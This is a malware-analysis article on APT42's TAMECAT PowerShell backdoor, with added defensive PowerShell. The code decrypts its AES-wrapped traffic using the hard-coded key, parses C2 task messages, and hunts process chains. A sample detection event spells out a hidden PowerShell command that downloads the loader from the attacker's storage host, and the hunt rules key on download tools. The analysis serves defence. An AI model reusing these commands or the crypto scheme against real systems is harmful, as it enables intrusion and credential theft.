TAMECAT Backdoor Steals Edge and Chrome Credentials

Iranian hackers from APT42 are ramping up their SpearSpecter espionage campaign, deploying the TAMECAT PowerShell backdoor to steal browser credentials and sensitive data from high-profile targets.

Recent analysis from Israel’s National Digital Agency reveals how this modular malware evades detection while targeting defense officials through sophisticated social engineering.

Campaign Overview

Details of TAMECAT's capabilities

APT42, tied to Iran’s Islamic Revolutionary Guard Corps Intelligence Organization, builds long-term trust with victims posing as journalists or event organizers before delivering payloads.

In the SpearSpecter operation, the attacks are tiered: low-value targets are sent to fake login pages, while high-value targets receive TAMECAT for persistent access via spear-phishing links or LNK files.

The group has used this against Western NGOs, media, Israeli defense personnel, and government figures since at least 2021, focusing on Iran-related intelligence.

Once rapport is established, victims receive lures such as conference invitations or documents hosted on attacker-controlled cloud services.

Clicking leads to credential theft or a direct malware drop. TAMECAT stands out for its flexibility: it can use HTTPS, Discord, or Telegram for C2, so blocking one channel does not cut the operator off.

Initial Infection Chain

Attacks often start with a VBScript downloader, such as the sample with the SHA256 hash 5404e39f2f175a0fc993513ee52be3679a64c69c79e32caa656fbb7645965422.

This script queries WMI for installed AV products. If the string "Windows" appears (indicating Defender), it launches conhost to run a hidden PowerShell script, which uses the wget alias (Invoke-WebRequest) to pull nconf.txt from hxxps://s3[.]tebi[.]io/icestorage/config/nconf[.]txt.

Otherwise, it falls back to cmd.exe and curl to fetch a secondary payload, which was often no longer being served at analysis time.

The PowerShell loader (MD5: 081419a484bbf99f278ce636d445b9d8) is obfuscated: string arrays are concatenated to rebuild commands, and cmdlets are resolved indirectly, for example Invoke-Expression via gcm (Get-Command) with a wildcard pattern such as e-e?p.

It spoofs a Chrome 119 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36.

Next, it retrieves df32s.txt from the same Tebi.io bucket; the URL is stored Base64-encoded in the script, and the first three bytes of the encoded string are stripped before it is decoded.

The encoded URL stored within the PowerShell file

The downloaded content is transformed by a bitwise NOT over every byte, a substring taken from position 24, and UTF-8 conversion, which yields an AES decryptor function.

Core Backdoor Mechanics

The loader's Gorba function holds Base64-wrapped, AES-encrypted blobs: $te12 is a large ciphertext, and $k12ey is T2r0y1M1e1n1o0w1, a pattern matching Volexity's PowerStar rules.

The AES parameters are a 256-bit key, kNz0CXiP0wEQnhZXYbvraigXvRVYHk1B (32 ASCII characters), and a 16-character IV such as 0T9r1y1M2e0N0o1w.

The decrypted code defines Borjol (Base64-decode, then AES-decrypt), Borpos (AES-encrypt), x (Base64 to UTF-8), and xs (a random 16-character IV drawn from a-zA-Z).
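The two decoding layers described above, the NOT-transformed stage text from df32s.txt and the Base64-wrapped AES blobs handled by Borjol/Borpos, can be reproduced with the same .NET AES classes the loader relies on. The following PowerShell is an added example, not TAMECAT's code and not the agency's analysis tooling: the function names (Convert-TamecatStage, Unprotect-TamecatBlob, Protect-TamecatBlob, New-TamecatIV) are this example's own, the key is the one published above, the IV is generated the way xs does it, and it assumes AES-256-CBC with PKCS7 padding, key and IV used as raw ASCII bytes, and the 24 junk bytes skipped before UTF-8 decoding. The sample stage text and plaintext are constructed.

```powershell
# Added example, not TAMECAT's own code: reproduces the loader's stage transform and its
# Borjol/Borpos AES helpers so captured blobs can be decrypted offline.
# Assumptions: AES-256-CBC with PKCS7 padding; key and IV are used as raw ASCII bytes
# (32 and 16 characters); the 24 junk bytes are skipped before UTF-8 decoding.

function Convert-TamecatStage {
    # Reverse the df32s.txt transform: bitwise NOT every byte, skip 24 bytes, UTF-8 decode.
    param([Parameter(Mandatory)][byte[]]$Raw)
    $inverted = [byte[]]($Raw | ForEach-Object { (-bnot $_) -band 0xFF })
    return [System.Text.Encoding]::UTF8.GetString($inverted, 24, $inverted.Length - 24)
}

function New-TamecatAes {
    param([string]$Key, [string]$IV)
    if ($Key.Length -ne 32 -or $IV.Length -ne 16) { throw 'Key must be 32 chars (256-bit), IV 16 chars' }
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key = [System.Text.Encoding]::ASCII.GetBytes($Key)
    $aes.IV  = [System.Text.Encoding]::ASCII.GetBytes($IV)
    return $aes
}

function Unprotect-TamecatBlob {
    # Borjol equivalent: Base64-decode, AES-decrypt, UTF-8 decode.
    param([string]$Base64, [string]$Key, [string]$IV)
    $aes = New-TamecatAes -Key $Key -IV $IV
    try {
        $cipher = [Convert]::FromBase64String($Base64)
        $plain  = $aes.CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length)
        return [System.Text.Encoding]::UTF8.GetString($plain)
    } finally { $aes.Dispose() }
}

function Protect-TamecatBlob {
    # Borpos equivalent; used here only to build a test vector for the decryptor.
    param([string]$Text, [string]$Key, [string]$IV)
    $aes = New-TamecatAes -Key $Key -IV $IV
    try {
        $plain = [System.Text.Encoding]::UTF8.GetBytes($Text)
        return [Convert]::ToBase64String($aes.CreateEncryptor().TransformFinalBlock($plain, 0, $plain.Length))
    } finally { $aes.Dispose() }
}

function New-TamecatIV {
    # xs equivalent: 16 random characters from a-zA-Z (chosen with replacement).
    $alphabet = [char[]]'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
    return -join (1..16 | ForEach-Object { Get-Random -InputObject $alphabet })
}

# --- Constructed round trip with the published key; no network involved ---
$key  = 'kNz0CXiP0wEQnhZXYbvraigXvRVYHk1B'
$iv   = New-TamecatIV
$blob = Protect-TamecatBlob -Text 'Write-Output "decrypted stage"' -Key $key -IV $iv
"IV=$iv  Blob=$blob"
Unprotect-TamecatBlob -Base64 $blob -Key $key -IV $iv

# --- Constructed df32s.txt-style stage: 24 junk bytes, then NOT-encoded UTF-8 text ---
$stageText = [System.Text.Encoding]::UTF8.GetBytes('function Borjol { param($b) }')
$encoded   = [byte[]](([byte[]]::new(24) + $stageText) | ForEach-Object { (-bnot $_) -band 0xFF })
Convert-TamecatStage -Raw $encoded
```

To decrypt a real capture, pass the Base64 body of a beacon or C2 response as -Base64 and the value of its Content-DPR header as -IV; the key does not change between sessions, which is exactly why the hard-coded key is worth extracting from the loader.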

TAMECAT writes a victim ID (e.g., GILNH9LX6TCZ9V8ZZSUF) to %LocalAppData%\config.txt and creates the Chrome subdir.

It beacons OS details and the ComputerName to hxxps://accurate-sprout-porpoise[.]glitch[.]me via POST. The body is AES-encrypted with the fixed key and a per-request random IV, which is sent in the Content-DPR header, and the ciphertext is Base64-wrapped.

C2 responses are split on ¶ into four fields: language (PowerShell or C#), a Base64-encoded command, ThreadName, and StartStop (start = download and execute, stop = terminate the named thread).

The command set is modular: browser credential theft from Edge (via its remote-debugging interface) and Chrome (by suspending the process), screenshots every 15 seconds, Outlook mailbox dumps, and file harvesting by extension. Exfiltration goes over HTTPS or FTP, or back through the C2 channels.
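The task format above is simple enough that decrypted responses can be parsed and replayed to see which named threads an operator left running. The PowerShell below is an added example, not TAMECAT's code: the function names are this example's own, the field order follows the write-up (language, Base64 command, ThreadName, StartStop), the task commands are constructed placeholders, and nothing is executed.

```powershell
# Added example, not TAMECAT's own code: parses the ¶-delimited task format a decrypted
# C2 response carries and replays start/stop tasks into a per-ThreadName ledger.
# Assumption: field order is language, Base64 command, ThreadName, StartStop, as in the
# write-up. Commands are decoded for inspection only and never executed.

$Pilcrow = [char]0x00B6   # U+00B6, the field separator

function ConvertFrom-TamecatTask {
    param([Parameter(Mandatory)][string]$Response)
    $parts = $Response.Split($Pilcrow)
    if ($parts.Count -lt 4) { throw "Malformed task: expected 4 fields, got $($parts.Count)" }
    [pscustomobject]@{
        Language   = $parts[0].Trim()
        Command    = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($parts[1].Trim()))
        ThreadName = $parts[2].Trim()
        Action     = $parts[3].Trim().ToLowerInvariant()   # start or stop
    }
}

function Update-TamecatLedger {
    # 'start' registers a named task, 'stop' removes it; anything else is flagged.
    param([hashtable]$Ledger, $Task)
    switch ($Task.Action) {
        'start' { $Ledger[$Task.ThreadName] = $Task }
        'stop'  { $Ledger.Remove($Task.ThreadName) }
        default { Write-Warning "Unknown StartStop value '$($Task.Action)' for $($Task.ThreadName)" }
    }
}

function New-TamecatTask {
    # Builds a response in the same format; used only to construct sample traffic.
    param([string]$Language, [string]$Command, [string]$ThreadName, [string]$Action)
    $b64 = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($Command))
    return ($Language, $b64, $ThreadName, $Action) -join $Pilcrow
}

# --- Constructed sequence of decrypted responses (commands are placeholders) ---
$responses = @(
    (New-TamecatTask 'PowerShell' 'Get-EdgeCredentials -RemoteDebugging' 'edge-creds' 'start'),
    (New-TamecatTask 'PowerShell' 'Invoke-Screenshot -IntervalSeconds 15' 'screens' 'start'),
    (New-TamecatTask 'C#' 'public class OutlookDump { }' 'outlook' 'start'),
    (New-TamecatTask 'PowerShell' '' 'screens' 'stop')
)

$ledger = @{}
foreach ($r in $responses) {
    $task = ConvertFrom-TamecatTask -Response $r
    "{0,-6} {1,-11} {2,-10} {3}" -f $task.Action, $task.ThreadName, $task.Language, $task.Command
    Update-TamecatLedger -Ledger $ledger -Task $task
}
"Still running: " + ($ledger.Keys -join ', ')   # edge-creds and outlook (order may vary)
```

On real traffic, feed each decrypted response body (see the AES helpers earlier in this article's register, or your own decryptor) into ConvertFrom-TamecatTask; the ledger then tells you which collection threads were active on the host at the end of the capture.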

Evasion and Persistence

TAMECAT runs in memory and relies on living-off-the-land components: WMI, native PowerShell, and cmd.

Obfuscation includes array fragments, wildcards, and string replacements. C2 runs through glitch.me (ephemeral hosting), Tebi.io S3 storage, and bots on Telegram and Discord, which issue dynamic commands that trigger per-victim actions when a user's message matches a specific trigger.

The AV check dictates which loader path runs, and nothing is written to disk beyond config.txt. Symmetric crypto (AES-256-CBC) with hard-coded keys hides the payloads, and rotating the IV per session defeats static signatures on the ciphertext. The hard-coded key cuts both ways, though: a defender who recovers it from the loader can decrypt captured beacons and tasks offline. MITRE ATT&CK mapping: T1059.001 (PowerShell), T1047 (WMI), T1027.013 (encrypted/encoded payloads), T1573.001 (encrypted C2).

Indicators of Compromise

Type      Indicator                                                           Description
SHA256    5404e39f2f175a0fc993513ee52be3679a64c69c79e32caa656fbb7645965422    VBS downloader
MD5       d7bf138d1aa2b70d6204a2f3c3bc72a7                                    VBS sample
MD5       081419a484bbf99f278ce636d445b9d8                                    nconf.txt loader
SHA256    bd1f0fb085c486e97d82b6e8acb3977497c59c3ac79f973f96c395e7f0ca97f8    Loader variant
URL       hxxps://s3[.]tebi[.]io/icestorage/config/nconf[.]txt                Loader host
URL       hxxps://s3[.]tebi[.]io/icestorage/df32s[.]txt                       Decryptor stage
URL       hxxps://accurate-sprout-porpoise[.]glitch[.]me                      Primary C2
Path      %LocalAppData%\config.txt                                           Victim ID drop
Key       kNz0CXiP0wEQnhZXYbvraigXvRVYHk1B                                    AES key
Header    Content-DPR                                                         IV carrier

Technical Mitigations

Hunt for wscript.exe spawning powershell.exe or cmd.exe, wget/curl invocations launched from VBScript, and Tebi.io traffic carrying the Chrome user-agent.

Enable PowerShell script block logging (and module logging, so decoded stages are captured), set the execution policy to AllSigned, and restrict PowerShell to administrators. Execution policy is a safety setting rather than a security boundary, since a loader can sidestep it with -ExecutionPolicy Bypass or -EncodedCommand, so pair it with AppLocker or WDAC, which also enforces Constrained Language Mode. Use EDR to trace process chains and monitor WMI activity, and block the glitch.me and Tebi.io indicators.

Train users to recognize rapport-building phishing (fake invitations); enforce MFA everywhere and disable app passwords. YARA rules from Mandiant and Volexity catch the loaders. For browsers, monitor for Edge launched with remote-debugging flags and for Chrome process suspensions.
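The hunting guidance above translates directly into rules over Sysmon process-creation events. The PowerShell below is an added example, not from the source write-up: the function names are this example's own, it assumes Sysmon logs to its default channel, the script-block-logging check reads the registry value Group Policy writes, and the three sample events are constructed to mirror the wscript to conhost to hidden PowerShell chain (one benign event is included to show it does not fire).

```powershell
# Added example, not from the source write-up: hunt logic for the chain above, run over Sysmon
# process-creation (EID 1) events, plus a check that script block logging is enforced by policy.
# Assumptions: Sysmon writes to its default log; the sample events below are constructed.

$LoaderHosts = @('s3.tebi.io', 'glitch.me')

function Test-TamecatProcessChain {
    # Emits a record with a Reason for each event that matches one of the hunt conditions.
    param([Parameter(ValueFromPipeline)]$Event)
    process {
        $parent = [IO.Path]::GetFileName([string]$Event.ParentImage).ToLowerInvariant()
        $child  = [IO.Path]::GetFileName([string]$Event.Image).ToLowerInvariant()
        $cmd    = [string]$Event.CommandLine
        $reasons = @()
        if (($parent -in @('wscript.exe','cscript.exe')) -and ($child -in @('cmd.exe','conhost.exe','powershell.exe','pwsh.exe'))) {
            $reasons += "script host $parent spawned $child"
        }
        if ($cmd -match '(?i)\b(wget|curl|iwr|invoke-webrequest)\b') {
            foreach ($h in $LoaderHosts) { if ($cmd -like "*$h*") { $reasons += "download from $h" } }
        }
        if ($cmd -match '(?i)\bgcm\s+\S*[?*]') { $reasons += 'wildcard cmdlet resolution (gcm e-e?p style)' }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{ UtcTime = $Event.UtcTime; Parent = $parent; Child = $child
                               Reason = ($reasons -join '; '); CommandLine = $cmd }
        }
    }
}

function Get-SysmonProcessEvents {
    # Live input: flattens Sysmon EID 1 into the fields the hunt uses. Needs Sysmon and admin rights.
    param([int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } -MaxEvents $MaxEvents |
        ForEach-Object {
            $data = @{}
            foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            [pscustomobject]@{ UtcTime = $data.UtcTime; ParentImage = $data.ParentImage
                               Image = $data.Image; CommandLine = $data.CommandLine }
        }
}

function Test-ScriptBlockLoggingPolicy {
    # True only when policy forces script block logging on (the registry value GPO writes).
    $p = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    $v = Get-ItemProperty -Path $p -Name EnableScriptBlockLogging -ErrorAction SilentlyContinue
    return ($null -ne $v -and [int]$v.EnableScriptBlockLogging -eq 1)
}

# --- Constructed sample events mirroring the chain: wscript -> conhost -> hidden PowerShell ---
$sample = @(
    [pscustomobject]@{ UtcTime = '2000-01-01 00:00:01'; ParentImage = 'C:\Windows\System32\wscript.exe'
                       Image = 'C:\Windows\System32\conhost.exe'; CommandLine = 'conhost.exe powershell -w hidden' },
    [pscustomobject]@{ UtcTime = '2000-01-01 00:00:02'; ParentImage = 'C:\Windows\System32\conhost.exe'
                       Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'powershell -w hidden -c "$u=(gcm *e-E?p*); wget https://s3.tebi.io/icestorage/config/nconf.txt -UseBasicParsing"' },
    [pscustomobject]@{ UtcTime = '2000-01-01 00:00:03'; ParentImage = 'C:\Windows\explorer.exe'
                       Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'powershell -c Get-ChildItem' }    # benign, should not match
)
$sample | Test-TamecatProcessChain | Format-Table -AutoSize
"Script block logging enforced by policy: $(Test-ScriptBlockLoggingPolicy)"
# On a live host: Get-SysmonProcessEvents | Test-TamecatProcessChain
```

The first sample event fires on the parent/child pair alone, the second on both the loader-host download and the wildcard gcm pattern, and the benign explorer-spawned PowerShell stays silent; on a live host the same filter runs over Get-SysmonProcessEvents, and the policy check is worth running on the same box, because script block logs are what let you recover the decoded stages after the fact.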
